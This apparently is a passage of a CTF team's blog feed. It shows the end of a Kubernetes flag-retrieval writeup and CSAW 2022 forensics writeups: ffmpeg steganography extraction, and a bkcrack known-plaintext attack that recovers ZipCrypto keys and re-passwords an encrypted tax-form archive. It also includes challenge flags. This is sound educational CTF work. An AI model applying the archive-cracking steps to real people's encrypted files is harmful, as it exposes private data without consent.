&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;get&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl get ncscctfs -n task4           &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;flag   17d&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And yes there is a ncscctf resource named flag! Let’s describe that thing and get the flag!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;describe&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kubectl describe ncscctfs flag -n task4 &lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/DhelAJU.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Flag:  &lt;code&gt;Securinets&amp;#123;CuSt0m_REs0urcEs_ArE_P0wErFul&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h1 id=&#34;final-words&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#final-words&#34;&gt;#&lt;/a&gt; Final Words&lt;/h1&gt;
&lt;p&gt;In conclusion, the success of this event and competition is due in no small part to the dedication and hard work of the technical team. Their expertise and professionalism were instrumental in overcoming the various challenges we faced throughout the event lifecycle, and their tireless efforts ensured that we delivered a product that met the highest standards of quality and performance. On behalf of the team, I would like to express our sincere gratitude to our technical colleagues for their unwavering commitment to the project, and for their invaluable contributions to its success&lt;/p&gt;
</content>
        <updated>2023-03-23T10:33:37.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/12/Writeups/csaw2022/</id>
        <title>CSAW&#39;2022 Forensics Writeup</title>
        <link rel="alternate" href="http://example.com/2022/09/12/Writeups/csaw2022/"/>
        <content type="html">&lt;p&gt;CSAW CTF is one of the oldest and biggest CTFs in the world, with more than 900 teams participating in the 2022 edition. We would like to thank the organizers for the stable infrastructure and the creative challenges.&lt;/p&gt;
&lt;p&gt;we finished first in the MENA region and 14th globally&lt;/p&gt;
&lt;p&gt;Kudos to everyone in my team SOter14 for their huge work and efforts, you can catch up with out latest news at &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9zb3RlcjE0LnRlY2g=&#34;&gt;our website&lt;/span&gt; and &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9TT3RlcjE0VGVhbQ==&#34;&gt;twitter page&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The contest was fun and challenging, we managed to solve 25 out of the 28 challenges in Pwn, Web, OSINT, Forensics, Steganography, Misc, Quantum Computing, AI, Cryptography, and Reverse Engineering.&lt;/p&gt;
&lt;p&gt;Below are the writeups for forensics challs: Noir, Not Too Taxing (Crypto), and Encrypted disk.&lt;/p&gt;
&lt;h1 id=&#34;noir-digital-forensics-steganography&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#noir-digital-forensics-steganography&#34;&gt;#&lt;/a&gt; Noir: Digital Forensics / Steganography&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;I am a forest, and a night of dark trees: but he who is not afraid of my darkness, will find banks full of roses under my cypresses. Friedrich Nietzsche.&lt;/p&gt;
&lt;p&gt;The image contains a flag in the format (flag)this_is_the_flag&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xQnVkYW1uZGdNNlRpb3l6VlhpY01LVkRqQTJGLUtVUHovdmlldz91c3A9c2hhcmluZw==&#34; data-background-image=&#34;https://ctftime.org/media/events/logo_48.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xQnVkYW1uZGdNNlRpb3l6VlhpY01LVkRqQTJGLUtVUHovdmlldz91c3A9c2hhcmluZw==&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CSAW 2022 - Noir&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Author - Wen Jun L.&#34; style=&#34;--block-color:#de2336;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL3dlbmpsLw==&#34; data-background-image=&#34;https://media-exp1.licdn.com/dms/image/C5603AQGZdulNxGshvg/profile-displayphoto-shrink_400_400/0/1602081502952?e=1668643200&amp;v=beta&amp;t=XeXg__QTpf__BhQHFkZD7sSsL7PeCEbEXdi-J66JfeU&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly93d3cubGlua2VkaW4uY29tL2luL3dlbmpsLw==&#34;&gt;Author - Wen Jun L.&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Wen Jun L. Linkedin Profile&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;This challenge blowed our minds, it was part of CSAW’21 Finals and it is a 0-solves chall, so it was offered in the Quals of 2022. We’ve got an image, bit heavy around 9 MB that looks like a scene from a horror game, storm, forest, and darkness. It was a twisted chall!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://github.com/u91o/noir/blob/main/noir.png?raw=true&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;First, we tried the normal steganogrpahy ways around it, but obviously that is a total waster of time.&lt;/p&gt;
&lt;p&gt;It had 100+ on Aperisolve alone!&lt;/p&gt;
&lt;p&gt;Technically, the image is merely noise in the three RGB channels whith contrast on few areas, that when included with the alpha channel gives the image as you see it! Amazing, it really feels like some streaming technique, a kind of standard that’s used by TVs to show pictures we can understand. But we neglected the thought of getting a video out of an image, how unfair! Instead we’ve thought of the noise as a raw data that we can feed to Audacity and hopefully get an audible thing out of it, using U-LAW since we’re dealing with RAW data, it made much sense, because we have seen some images filled with noise turning into audio. But a video, insane!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/dpalAg1.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And of course, it was a video!&lt;/p&gt;
&lt;p&gt;Noir represents a kind of movies, black and white, crime generally, and that’s how we finally went into the idea that we’re dealing with a video rather than an audio.&lt;/p&gt;
&lt;p&gt;The Noir movies are taped to a stripe and played through a wheel showing still images 24 frames a second - Oh, keep that in mind! Still images mean also RAW data. That could help.&lt;/p&gt;
&lt;p&gt;But still we wonder, how to extract the video.&lt;br&gt;
Well it can’t be manually, there must be a tool, or it would be a total nightmare.&lt;/p&gt;
&lt;p&gt;To save you some time, it was  &lt;code&gt;FFmpeg&lt;/code&gt; !!&lt;/p&gt;
&lt;p&gt;FFmpeg is a free and open-source software project consisting of a suite of libraries and programs for handling video, audio, and other multimedia files and streams. At its core is the command-line ffmpeg tool itself, designed for processing of audiovisual files. Per Wikipedia.&lt;/p&gt;
&lt;p&gt;Well, that means some sort of conversion, right? Yep, but from a single png to what? There are hundreds of video formats out there, some of them are no longer being used.&lt;/p&gt;
&lt;p&gt;But we can narrow our results, to lightweight ones since the image is just 9 MB, 24 fps if that helps, RAW data, so no codecs!&lt;/p&gt;
&lt;p&gt;FFmpeg command to convert formats is basically:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;ffmpeg command&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;ffmpeg -i &lt;span class=&#34;built_in&#34;&gt;source&lt;/span&gt; -pix_fmt pixelformat  -f rawvideo - &amp;gt; output.extension&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;You can specify the frames, although ffmpeg can pretty much detect that automatically.&lt;/p&gt;
&lt;p&gt;We need the pixelformat and the extension. We’re getting close!&lt;/p&gt;
&lt;p&gt;Hmm, since we’re dealing with an image, can’t the extension of the video we’re looking for be both an image extension and a video extension. WEBM answers that. How clever!&lt;/p&gt;
&lt;p&gt;Webm is actually the only extension we’ve found thats a Joker, can be an image/audio/video. Which makes it special. That’s it, by luck, we got it, WEBM.&lt;/p&gt;
&lt;p&gt;However we tried a lot of extenison, it was a game of trial and error, for instance we checked mp4, wmv, avi, mkv, flv, mov, you name it…&lt;/p&gt;
&lt;p&gt;FFmpeg needs a pixel format, well, there is a hude table of these formats…&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;pixels format&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;37&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;name=     yuv420p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     yuyv422, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=       rgb24, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=       bgr24, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     yuv422p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     yuv444p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=       rgb32, nb_channels=   4, depth=   8, is_alpha=y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     yuv410p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     yuv411p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=      rgb565, nb_channels=   3, depth=   5, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=      rgb555, nb_channels=   3, depth=   5, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        gray, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=       monow, nb_channels=   1, depth=   1, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=       monob, nb_channels=   1, depth=   1, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        pal8, nb_channels=   4, depth=   8, is_alpha=y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=    yuvj420p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=    yuvj422p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=    yuvj444p, nb_channels=   3, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=      xvmcmc, nb_channels=   0, depth=   0, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=    xvmcidct, nb_channels=   0, depth=   0, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     uyvy422, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=   uyyvyy411, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=       bgr32, nb_channels=   4, depth=   8, is_alpha=y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=      bgr565, nb_channels=   3, depth=   5, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=      bgr555, nb_channels=   3, depth=   5, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        bgr8, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        bgr4, nb_channels=   1, depth=   4, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=   bgr4_byte, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        rgb8, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        rgb4, nb_channels=   1, depth=   4, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=   rgb4_byte, nb_channels=   1, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        nv12, nb_channels=   2, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=        nv12, nb_channels=   2, depth=   8, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     rgb32_1, nb_channels=   4, depth=   8, is_alpha=y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=     bgr32_1, nb_channels=   4, depth=   8, is_alpha=y&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=    gray16be, nb_channels=   1, depth=  16, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;name=    gray16le, nb_channels=   1, depth=  16, is_alpha=n&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Well, we didn’t guess, we, at this stage, after looking deeply into the image, and as said before, the RGB channels are carrying noise that surely represent the video, however the alpha channel is the one that shape the picture as we see it in the previews. So the pixel format we choose is rgb24 excluding the alpha channel.&lt;/p&gt;
&lt;p&gt;The final command is:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;ffmpeg -i noir.png -pix_fmt rgb24  -f rawvideo - &amp;gt; vid.webm&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Coool, after all the hustle we’ve got a video, a subway with blinking lights, or should I say, Morse Code!&lt;br&gt;
The clock was ticking, we’re at the final hours of the CTF, and the video is 2 mins long.&lt;br&gt;
Could there be any OpenCV tool for this! Of course, here is a link you might need it as well &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9naXRodWIuY29tL1JhemVyMjAxNS9Nb3JzZURlY29kZXI=&#34;&gt;MorseDecoder&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Here is a link for the video as well &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xOU5TOTJXblZZMUlNbEc0aHlFWVh2c0U3MWpfbTFDcG8vdmlldz91c3A9c2hhcmluZw==&#34;&gt;video.webm&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Using the tool, I let it record my screen and positioned the cross selection on the train lights. Within a minute we’ve got the flag!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/wh0uUv2.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Finally, it was a creative challenge we must say!&lt;/p&gt;
&lt;p&gt;The flag is  &lt;code&gt;(flag)sil3nt_refl3ct1on&lt;/code&gt;&lt;/p&gt;
&lt;h1 id=&#34;not-too-taxing-digital-forensics-cryptography&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#not-too-taxing-digital-forensics-cryptography&#34;&gt;#&lt;/a&gt; Not Too Taxing: Digital Forensics / Cryptography&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;We intercepted some email communications between a tax consultant and his client that contained some important tax documents. We were able to successfully extract two of the documents, but we can’t figure out the password to the file in order to extract the data. Attached are the two extracted files, Tax_Ret_Form_Blank.pdf and Tax_Ret_Form_Nov_2021.zip, and a transcript of the emails we found, SPBlock_Email.pdf.&lt;/p&gt;
&lt;p&gt;Can you figure out the password so we can get this guy’s info?&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2RyaXZlL2ZvbGRlcnMvMXo1SGxYR1lhVnhtTndWbXhkRFhGQk9PSUFlZEt6c1pNP3VzcD1zaGFyaW5n&#34; data-background-image=&#34;https://ctftime.org/media/events/logo_48.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2RyaXZlL2ZvbGRlcnMvMXo1SGxYR1lhVnhtTndWbXhkRFhGQk9PSUFlZEt6c1pNP3VzcD1zaGFyaW5n&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CSAW 2022 - Not Too Taxing&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;In this challenge we were given, an encrypted zip archive containing a filled state tax form document for the month of Novemeber 2021, the emails transmitted between … and the client, as well as the template of the tax form blank.&lt;/p&gt;
&lt;p&gt;We’ve noticed the zip was using the ZipCrypto Store compression, which is breakable if you can find 12 bytes of the data inside the zip, 8 of which got to be contiguous.&lt;/p&gt;
&lt;p&gt;ZipCrypto is considered as the legacy encryption of archives, you must be aware that it is the default method used in most Linux distros: ZipCrypto Deflate. Thus you might want to manually change that method when compressing to AES for higher security.&lt;/p&gt;
&lt;p&gt;The ZipCrypto algorithm generates a pseudo-random stream of bytes/keystream, which is XORed to the entry’s content. to produce the encrypted data. The generator’s state made of three 32-bits integers (keys), is initialized using the password and then contiuously updating as encryption goes on.&lt;/p&gt;
&lt;p&gt;This encryption algorithm is vulnerable to known plaintext attacks to recover the content fully.&lt;/p&gt;
&lt;p&gt;We’re going to use  &lt;code&gt;bkcrack&lt;/code&gt;  tool which can recover the content of the archive, change a zip archive’s password, and recover the original password. All by retrieving the zip archive three generated keys.&lt;/p&gt;
&lt;p&gt;The installation is pretty straight forward, just git clone the repo then,&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;cmake --build build --config Release&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;cmake --build build --config Release --target install&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Well, we must use the blank tax form as our plaintext attack, as it shares a lot of identical bytes with the filled form inside the zip.&lt;/p&gt;
&lt;p&gt;However you can’t just feed the pdf to bkcrack and hope for it to crack the zip. The tool requires a non encrypted zip with the similar bytes inside to attack the encrypted zip.&lt;/p&gt;
&lt;p&gt;So let’s get our blank form inside a zip and specify the method of encryption as ZipCrypto and the compression level as store. Now we guarantee there are plenty of similar bytes to execute the attack.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/ouMza3O.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;First we retrieve the three keys from the zip archive using&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;bkcrack -C Tax_Ret_Form_Nov_2021.zip -c Tax_Ret_Form_Nov_2021.zip -P Tax_Ret_Blank.zip -p Tax_Ret_Form_Blank.pdf&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;-C: Specifies the encrypted zip archive&lt;br&gt;
-c: Specifies the target file within the archive&lt;br&gt;
-P: Specifies the plaintext zip archive&lt;br&gt;
-p: specifies the plaintext file within the non encrypted archive.&lt;/p&gt;
&lt;p&gt;Now let it process for a while, it should not take long, as we provided more than enough data to bkcrack.&lt;/p&gt;
&lt;p&gt;Here are they keys I have got:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;result&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;b2c4a24e f036ff3a 998f6727&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;If the compression wasn’t Store, and instead it was Deflate, then the Github repo provides some python scripts to decompress those types, just first include  &lt;code&gt;-d deciphered&lt;/code&gt;  at the end of the previous command.&lt;/p&gt;
&lt;p&gt;Then run:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;python3 tools/inflate.py deciphered decompressed&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In our case, it was just Store, so we move on to the next step, we’re going to recreate the very same archive with a password of our choise, this is the fastest way around Zip crypto archives, you can go ahead and retrieve the password, we will show that. However that process will take a bit longer.&lt;/p&gt;
&lt;figure class=&#34;highlight plaintext&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command Line&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;bkcrack -C Tax_Ret_Form_Nov_2021.zip -k b2c4a24e f036ff3a 998f6727 -U unlocked.zip 1234&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And within a second, we got our new archive with the filled document restored successfully!&lt;/p&gt;
